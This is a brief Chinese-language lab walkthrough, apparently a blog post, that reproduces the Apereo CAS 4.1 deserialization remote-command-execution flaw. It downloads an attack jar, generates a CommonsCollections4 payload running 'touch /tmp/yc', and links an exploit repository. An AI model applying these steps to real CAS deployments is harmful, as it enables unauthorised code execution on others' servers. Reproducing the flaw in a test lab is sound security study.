Apereo CAS 4.1 反序列化命令执行漏洞

Apereo CAS 4.1 反序列化命令执行漏洞_第1张图片

一、环境搭建

Apereo CAS 4.1 反序列化命令执行漏洞_第2张图片

二、访问

Apereo CAS 4.1 反序列化命令执行漏洞_第3张图片

三、准备工具

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

Apereo CAS 4.1 反序列化命令执行漏洞_第4张图片

四、生成加密后的payload

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/yc"

Apereo CAS 4.1 反序列化命令执行漏洞_第5张图片

五、抓包修改

Apereo CAS 4.1 反序列化命令执行漏洞_第6张图片

六、查看效果

Apereo CAS 4.1 反序列化命令执行漏洞_第7张图片

如上图所示,则表明漏洞存在

七、漏洞利用

工具:

git clone https://gitee.com/keyboxdzd/Cas_Exploit.git​

Apereo CAS 4.1 反序列化命令执行漏洞_第8张图片

最后的效果是这样的,笔者电脑问题,没继续了。

你可能感兴趣的:(安全)